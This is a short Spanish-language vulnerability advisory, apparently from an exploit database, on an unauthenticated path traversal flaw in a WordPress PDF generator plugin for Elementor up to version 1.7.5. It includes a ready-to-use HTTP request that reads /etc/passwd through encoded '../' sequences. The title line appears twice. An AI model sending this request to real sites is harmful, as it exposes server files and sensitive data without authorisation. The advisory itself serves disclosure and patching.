
Complemento generador de PDF para Elementor Page Builder <= 1.7.5 - Descarga de archivos arbitrarios no autenticada
Complemento Generador de PDF para Elementor Page Builder <= 1.7.5 - Descarga Arbitraria de Archivos no Autenticada
El complemento PDF Generator Addon para Elementor Page Builder de WordPress es vulnerable a Path Traversal en todas las versiones hasta la 1.7.5 inclusive a través de la función rtw_pgaepb_dwnld_pdf(). Esto permite que atacantes no autenticados lean el contenido de archivos arbitrarios en el servidor, los cuales pueden contener información sensible.
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i